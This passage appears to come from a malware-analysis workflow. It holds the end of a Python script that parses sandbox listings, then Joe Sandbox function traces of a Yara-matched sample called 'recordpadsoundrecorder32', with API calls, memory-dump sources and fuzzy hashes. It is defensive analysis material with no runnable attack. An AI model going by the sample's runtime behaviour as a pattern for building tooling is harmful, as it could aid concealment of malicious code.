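• Opcode ID: 4aaf6431a86a3e1b64adb0ac6cacf79278b3423449d869d3d4f8b0d8db8643b2
"""

if __name__ == "__main__":
    for e in parse_listing(SAMPLE):
        print(e.opcode_id[:12], "->", " > ".join(api_sequence(e)))
        print("   labels:", classify(e), "service:", service_name(e))
```

Ordering by the `ref:` address rather than by listing order matters because the report interleaves "Part of subcall function" lines at the position of the call into the subroutine, not at the address of the inner API call; keeping subcalls out of the default sequence gives the direct call order of the function itself. Note that the String ID field is per-function only for entries from the PE-backed dump; entries from the unbacked 02601000 region carry their strings in the API lines themselves.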
                                                                                      APIs
                                                                                      • RtlDecodePointer.NTDLL(?), ref: 026182EA
                                                                                      • _free.LIBCMT ref: 02618303
                                                                                        • Part of subcall function 02612F24: HeapFree.KERNEL32(00000000,00000000,?,02615C82,00000000,?,?,?,00000000,?,02618967,00000018,026316B8,00000008,026188B4,?), ref: 02612F38
                                                                                        • Part of subcall function 02612F24: GetLastError.KERNEL32(00000000,?,02615C82,00000000,?,?,?,00000000,?,02618967,00000018,026316B8,00000008,026188B4,?,?), ref: 02612F4A
                                                                                      • _free.LIBCMT ref: 02618316
                                                                                      • _free.LIBCMT ref: 02618334
                                                                                      • _free.LIBCMT ref: 02618346
                                                                                      • _free.LIBCMT ref: 02618357
                                                                                      • _free.LIBCMT ref: 02618362
                                                                                      • _free.LIBCMT ref: 02618386
                                                                                      • RtlEncodePointer.NTDLL(008798F0), ref: 0261838D
                                                                                      • _free.LIBCMT ref: 026183A2
                                                                                      • _free.LIBCMT ref: 026183B8
                                                                                      • _free.LIBCMT ref: 026183E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 3064303923-0
                                                                                      • Opcode ID: e149350d724d3ec945684730c170661ac456ff7a600445b02900d47e87ef2b54
                                                                                      • Instruction ID: 63da883f4450bb7d5eb86f7c83a697fa2b1ec6e511aa5a5f0ec13ab1d357aec0
                                                                                      • Opcode Fuzzy Hash: e149350d724d3ec945684730c170661ac456ff7a600445b02900d47e87ef2b54
                                                                                      • Instruction Fuzzy Hash: F821B472D842A0EFE7265F65F98051D77B9FB0672070D282DE80497340CB35ACA8CFA8
                                                                                      APIs
                                                                                      • LCMapStringW.KERNEL32(00000000,00000100,00408650,00000001,00000000,00000000,00000103,00000001,00000000,?,00406357,00200020,00000000,?,00000000,00000000), ref: 004068D9
                                                                                      • LCMapStringA.KERNEL32(00000000,00000100,0040864C,00000001,00000000,00000000,?,00406357,00200020,00000000,?,00000000,00000000,00000001), ref: 004068F5
                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,Wc@ ,?,00000103,00000001,00000000,?,00406357,00200020,00000000,?,00000000,00000000), ref: 0040693E
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00406357,00200020,00000000,?,00000000,00000000), ref: 00406976
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00406357,00200020,00000000,?,00000000), ref: 004069CE
                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00406357,00200020,00000000,?,00000000), ref: 004069E4
                                                                                      • LCMapStringW.KERNEL32(?,?,?,00000000,Wc@ ,?,?,00406357,00200020,00000000,?,00000000), ref: 00406A17
                                                                                      • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00406357,00200020,00000000,?,00000000), ref: 00406A7F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$ByteCharMultiWide
                                                                                      • String ID: Wc@
                                                                                      • API String ID: 352835431-4128830131
                                                                                      • Opcode ID: c59ed56cf9200d4eb4cbe2117608f716f3cf8688afb6deb225ba4043c85c6758
                                                                                      • Instruction ID: c30aaca26a5f6a0372154cda3c497b92e07e281ea3e6606adb1712902525b657
                                                                                      • Opcode Fuzzy Hash: c59ed56cf9200d4eb4cbe2117608f716f3cf8688afb6deb225ba4043c85c6758
                                                                                      • Instruction Fuzzy Hash: 8A517E71A00209EBCF219F94CD45ADF7FB5FB49750F11812AF911B12A0D7398921DF69
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402F74), ref: 00403BFD
                                                                                      • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402F74), ref: 00403C11
                                                                                      • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402F74), ref: 00403C3D
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402F74), ref: 00403C75
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402F74), ref: 00403C97
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402F74), ref: 00403CB0
                                                                                      • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402F74), ref: 00403CC3
                                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403D01
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                      • String ID: t/@
                                                                                      • API String ID: 1823725401-3363397731
                                                                                      • Opcode ID: aff10945ecf90bbee9edc284fe0c12867232451494807f8f70b2732d2a40bc2d
                                                                                      • Instruction ID: 879d38be92084954eaea71e49c87bd85cc2f9a5de8a3f101a3316a48e994b743
                                                                                      • Opcode Fuzzy Hash: aff10945ecf90bbee9edc284fe0c12867232451494807f8f70b2732d2a40bc2d
                                                                                      • Instruction Fuzzy Hash: 3E31017350C2246EE7203F746CC483BBE9CEA4575AB15053FF982F3280DA398E8146AD
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 02603428
                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 0260346B
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 02603472
                                                                                      • GetLastError.KERNEL32 ref: 02603486
                                                                                      • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 026034D7
                                                                                      • RtlEnterCriticalSection.NTDLL(00000018), ref: 026034ED
                                                                                      • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02603518
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                                      • String ID: CancelIoEx$KERNEL32
                                                                                      • API String ID: 2902213904-434325024
                                                                                      • Opcode ID: d88bb450512ba2e60df053fa6fbb7696af830d3cc2586f95543b12ae7a95f3bc
                                                                                      • Instruction ID: 03da21bba737279fca4420cabea3a95bc262e92f7b7ee91118e24b948827791f
                                                                                      • Opcode Fuzzy Hash: d88bb450512ba2e60df053fa6fbb7696af830d3cc2586f95543b12ae7a95f3bc
                                                                                      • Instruction Fuzzy Hash: 4E31CDB1900615DFDB169F64C984A6FBBF8FF49312F0588A9E8059B380C770D915CFA1
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,004043C1,?,Microsoft Visual C++ Runtime Library,00012010,?,00408584,?,004085D4,?,?,?,Runtime Error!Program: ), ref: 004065CA
                                                                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004065E2
                                                                                      • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004065F3
                                                                                      • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00406600
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                      • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                      • API String ID: 2238633743-4044615076
                                                                                      • Opcode ID: 1e827d42bf4979efd8fc0e05e1792a28396127eff3a42ececc528c363af0fc92
                                                                                      • Instruction ID: db39845ca5f1b339293cd545309a4189fd77c948f0b46f5b4ed21715b02f5541
                                                                                      • Opcode Fuzzy Hash: 1e827d42bf4979efd8fc0e05e1792a28396127eff3a42ececc528c363af0fc92
                                                                                      • Instruction Fuzzy Hash: 46018871A40611EFC7208FB5AFC49277EE99B587407061D3FA541F2291DE7B8811CB6D
                                                                                      APIs
                                                                                      • GetStringTypeW.KERNEL32(00000001,00408650,00000001,00000000,00000103,00000001,00000000,00406357,00200020,00000000,?,00000000,00000000,00000001), ref: 0040678D
                                                                                      • GetStringTypeA.KERNEL32(00000000,00000001,0040864C,00000001,?,?,00000000,00000000,00000001), ref: 004067A7
                                                                                      • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00406357,00200020,00000000,?,00000000,00000000,00000001), ref: 004067DB
                                                                                      • MultiByteToWideChar.KERNEL32(Wc@ ,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00406357,00200020,00000000,?,00000000,00000000,00000001), ref: 00406813
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00406869
                                                                                      • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 0040687B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: StringType$ByteCharMultiWide
                                                                                      • String ID: Wc@
                                                                                      • API String ID: 3852931651-4128830131
                                                                                      • Opcode ID: 51aa12949cff19f931a0c8f8e78869120ffa08a7a0a03f1196022c1900c26aa0
                                                                                      • Instruction ID: 956ec2585e1336e719d8d065e8dcf62e24d3c9f54db028b8b8152b0cc77897f4
                                                                                      • Opcode Fuzzy Hash: 51aa12949cff19f931a0c8f8e78869120ffa08a7a0a03f1196022c1900c26aa0
                                                                                      • Instruction Fuzzy Hash: 3F419F72501209EFCF20AF94DD85EAF3B79FB04754F11453AF902F2290C73989248BA9
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 0040430A
                                                                                      • GetStdHandle.KERNEL32(000000F4,00408584,00000000,?,00000000,00000000), ref: 004043E0
                                                                                      • WriteFile.KERNEL32(00000000), ref: 004043E7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$HandleModuleNameWrite
                                                                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                      • API String ID: 3784150691-4022980321
                                                                                      • Opcode ID: efc2387ad9e4ebc715aa49f254a253419fe4c6ba22f87958d70440b8e59437cd
                                                                                      • Instruction ID: d8635e2a7f81e525e6493e1b235b12eebf94c6aed7416e9ae0bb5a91e3b582aa
                                                                                      • Opcode Fuzzy Hash: efc2387ad9e4ebc715aa49f254a253419fe4c6ba22f87958d70440b8e59437cd
                                                                                      • Instruction Fuzzy Hash: ED318572601219AEDF20AA60DE46FDA336CAF85304F1004BFF944B61D1DA78DE448A5D
                                                                                      APIs
                                                                                      • OpenEventA.KERNEL32(00100002,00000000,00000000,3DC92DE0), ref: 02611660
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02611675
                                                                                      • ResetEvent.KERNEL32(00000000,3DC92DE0), ref: 0261167F
                                                                                      • CloseHandle.KERNEL32(00000000,3DC92DE0), ref: 026116B4
                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,3DC92DE0), ref: 0261172A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0261173F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseEventHandle$CreateOpenReset
                                                                                      • String ID:
                                                                                      • API String ID: 1285874450-0
                                                                                      • Opcode ID: c6385ebbd3420ca08ba96497d908fed7daf15dfca9727497b1202ce51d5c9347
                                                                                      • Instruction ID: 25d7a0eb57fb1752a734d7e644e5aa4d164e109d5c5709dca31d75248f50ae5b
                                                                                      • Opcode Fuzzy Hash: c6385ebbd3420ca08ba96497d908fed7daf15dfca9727497b1202ce51d5c9347
                                                                                      • Instruction Fuzzy Hash: C5414070D04358AFDF21CFA5D848BADB7B8EF06724F284259E918EB380D735A945CB90
                                                                                      APIs
                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 026020AC
                                                                                      • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 026020CD
                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 026020D8
                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 0260213E
                                                                                      • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 0260217A
                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 02602187
                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 026021A6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                                      • String ID:
                                                                                      • API String ID: 1171374749-0
                                                                                      • Opcode ID: 3559a0c79921459f848490bbc2b44ad318ab3d7e8ed71516b358ed63e6d8787d
                                                                                      • Instruction ID: d4f80fcb2e7c68abc295b514aaddd381d841cd9c08ff92d9d5bc81a2dfa6cc4f
                                                                                      • Opcode Fuzzy Hash: 3559a0c79921459f848490bbc2b44ad318ab3d7e8ed71516b358ed63e6d8787d
                                                                                      • Instruction Fuzzy Hash: 604149B15047419FC325DF25C889E6BBBF9EFC8754F004A1EA99682290D730E949DF92
                                                                                      APIs
                                                                                        • Part of subcall function 02611E80: OpenEventA.KERNEL32(00100002,00000000,?,?,?,026116DE,?,?), ref: 02611EAF
                                                                                        • Part of subcall function 02611E80: CloseHandle.KERNEL32(00000000,?,?,026116DE,?,?), ref: 02611EC4
                                                                                        • Part of subcall function 02611E80: SetEvent.KERNEL32(00000000,026116DE,?,?), ref: 02611ED7
                                                                                      • OpenEventA.KERNEL32(00100002,00000000,00000000,3DC92DE0), ref: 02611660
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02611675
                                                                                      • ResetEvent.KERNEL32(00000000,3DC92DE0), ref: 0261167F
                                                                                      • CloseHandle.KERNEL32(00000000,3DC92DE0), ref: 026116B4
                                                                                      • __CxxThrowException@8.LIBCMT ref: 026116E5
                                                                                        • Part of subcall function 0261450A: RaiseException.KERNEL32(?,?,0260FB0D,?,?,?,?,?,?,?,0260FB0D,?,02630F68,?), ref: 0261455F
                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,3DC92DE0), ref: 0261172A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0261173F
                                                                                        • Part of subcall function 02611BC0: GetCurrentProcessId.KERNEL32(?), ref: 02611C19
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,3DC92DE0), ref: 0261174F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                                      • String ID:
                                                                                      • API String ID: 2227236058-0
                                                                                      • Opcode ID: 6ab58aff37cd34d9a51c3fa832742f2fada2ced887b151c11d07f7a888d896ac
                                                                                      • Instruction ID: 159387b07b7a4e939f98fdfd774b662a00d0069d3c82b4c88ee8ab1d8b7edfb5
                                                                                      • Opcode Fuzzy Hash: 6ab58aff37cd34d9a51c3fa832742f2fada2ced887b151c11d07f7a888d896ac
                                                                                      • Instruction Fuzzy Hash: DE317071E003589BDF21DBE4DC49BADB7B9AF06314F2C4259EA1CEB380D721A905CB95
                                                                                      APIs
                                                                                      • __init_pointers.LIBCMT ref: 02615D44
                                                                                        • Part of subcall function 026184B2: RtlEncodePointer.NTDLL(00000000), ref: 026184B5
                                                                                        • Part of subcall function 026184B2: __initp_misc_winsig.LIBCMT ref: 026184D0
                                                                                        • Part of subcall function 026184B2: GetModuleHandleW.KERNEL32(kernel32.dll,?,02631568,00000008,00000003,02630F4C,?,00000001), ref: 02619231
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02619245
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02619258
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0261926B
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0261927E
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02619291
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 026192A4
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 026192B7
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 026192CA
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 026192DD
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 026192F0
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02619303
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02619316
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02619329
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0261933C
                                                                                        • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0261934F
                                                                                      • __mtinitlocks.LIBCMT ref: 02615D49
                                                                                      • __mtterm.LIBCMT ref: 02615D52
                                                                                        • Part of subcall function 02615DBA: RtlDeleteCriticalSection.NTDLL(00000000), ref: 026188E8
                                                                                        • Part of subcall function 02615DBA: _free.LIBCMT ref: 026188EF
                                                                                        • Part of subcall function 02615DBA: RtlDeleteCriticalSection.NTDLL(02633978), ref: 02618911
                                                                                      • __calloc_crt.LIBCMT ref: 02615D77
                                                                                      • __initptd.LIBCMT ref: 02615D99
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02615DA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                      • String ID:
                                                                                      • API String ID: 3567560977-0
                                                                                      • Opcode ID: e7f8fa82544ae377b0a1e8643fb076b532ec7abcd6f6bef61c60419edc3359f2
                                                                                      • Instruction ID: 7aae70e8d7d30b37df7746fd55fadd3042045695c72145813b63164ba307fbc8
                                                                                      • Opcode Fuzzy Hash: e7f8fa82544ae377b0a1e8643fb076b532ec7abcd6f6bef61c60419edc3359f2
                                                                                      • Instruction Fuzzy Hash: D2F0C23295A7211AF7247674780A68A7797DB42730F5C461DE462D62C0FF10B4814A4D
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02613423,00000000), ref: 0261348B
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 02613492
                                                                                      • RtlEncodePointer.NTDLL(00000000), ref: 0261349E
                                                                                      • RtlDecodePointer.NTDLL(00000001), ref: 026134BB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                      • String ID: RoInitialize$combase.dll
                                                                                      • API String ID: 3489934621-340411864
                                                                                      • Opcode ID: 9b8d818f8f10ff13d76d4a3c4a2ec7107fdf0821a40afab9e3f28fc290edd59c
                                                                                      • Instruction ID: 0a74e0f9ad42ef9284a8d4cb579892a221c61e3c892f72a72b510f1778c88148
                                                                                      • Opcode Fuzzy Hash: 9b8d818f8f10ff13d76d4a3c4a2ec7107fdf0821a40afab9e3f28fc290edd59c
                                                                                      • Instruction Fuzzy Hash: FAE0ED70DD4795EAEB211F71ED4EF0D3759AB05706F04A864B502D5284CBB551AC8F14
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02613460), ref: 02613560
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 02613567
                                                                                      • RtlEncodePointer.NTDLL(00000000), ref: 02613572
                                                                                      • RtlDecodePointer.NTDLL(02613460), ref: 0261358D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                      • String ID: RoUninitialize$combase.dll
                                                                                      • API String ID: 3489934621-2819208100
                                                                                      • Opcode ID: 999b048e0cdf8d2855f230bfbb10ff47258669b991278e3348442536e825ca25
                                                                                      • Instruction ID: 29ca7f20a8f6510f34ba79f2c8bb1e1cef69118ad90c3e6afc1f8bf6982d332a
                                                                                      • Opcode Fuzzy Hash: 999b048e0cdf8d2855f230bfbb10ff47258669b991278e3348442536e825ca25
                                                                                      • Instruction Fuzzy Hash: F0E01AB0DD1750EAEB210F60EE0EB0D3668BB00B05F056854B102A1244C77452F8CB24
                                                                                      APIs
                                                                                      • TlsGetValue.KERNEL32(00000026,3DC92DE0,?,?,?,?,00000000,02626A68,000000FF,0261217A), ref: 02611F1A
                                                                                      • TlsSetValue.KERNEL32(00000026,0261217A,?,?,00000000), ref: 02611F87
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02611FB1
                                                                                      • HeapFree.KERNEL32(00000000), ref: 02611FB4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: HeapValue$FreeProcess
                                                                                      • String ID:
                                                                                      • API String ID: 1812714009-0
                                                                                      • Opcode ID: d8ab75fff2fdbdb8e4d492db45b09cc5e3ead796d21f638175109b9f3d6e20a5
                                                                                      • Instruction ID: 0b67001527fcb506dbe39e6d139c5dc4d1698fc1056a76b0e8fc22df6bc8a314
                                                                                      • Opcode Fuzzy Hash: d8ab75fff2fdbdb8e4d492db45b09cc5e3ead796d21f638175109b9f3d6e20a5
                                                                                      • Instruction Fuzzy Hash: 0A51AD719043949FDB20CF29C888F1ABBE5FB4A764F098698E96997390D731FC44CB90
                                                                                      APIs
                                                                                      • _ValidateScopeTableHandlers.LIBCMT ref: 02625740
                                                                                      • __FindPESection.LIBCMT ref: 0262575A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FindHandlersScopeSectionTableValidate
                                                                                      • String ID:
                                                                                      • API String ID: 876702719-0
                                                                                      • Opcode ID: 63f21fe4fc28eefc0ccf6bf76f98d8d46e6eb2ef3de44d51e90ff959f26d2e46
                                                                                      • Instruction ID: 82b16ccc952069b716aea3a9edbba417914cd36915632be0e31fe1cdc207e1f6
                                                                                      • Opcode Fuzzy Hash: 63f21fe4fc28eefc0ccf6bf76f98d8d46e6eb2ef3de44d51e90ff959f26d2e46
                                                                                      • Instruction Fuzzy Hash: D6A1A4B1E40A258FDB39CF18C980BADB7A5FB44324F644669DC06AB350E731E949CF90
                                                                                      APIs
                                                                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02601CB1
                                                                                      • CloseHandle.KERNEL32(?), ref: 02601CBA
                                                                                      • InterlockedExchangeAdd.KERNEL32(02637264,00000000), ref: 02601CC6
                                                                                      • TerminateThread.KERNEL32(?,00000000), ref: 02601CD4
                                                                                      • QueueUserAPC.KERNEL32(02601E7C,?,00000000), ref: 02601CE1
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02601CEC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                      • String ID:
                                                                                      • API String ID: 1946104331-0
                                                                                      • Opcode ID: 1da9a297e2ca668bd4b8544aa9610a928366f530b7fe2b02f82d3831019f8878
                                                                                      • Instruction ID: 980467ea5d207772f88b16b00123f766ac1d7bc794f56c94cc6ebe01ea8423fa
                                                                                      • Opcode Fuzzy Hash: 1da9a297e2ca668bd4b8544aa9610a928366f530b7fe2b02f82d3831019f8878
                                                                                      • Instruction Fuzzy Hash: A5F0F471940640BFD7224B95DC0DC5FFBBCEB45720B01469DF52A82190DB70A958CB60
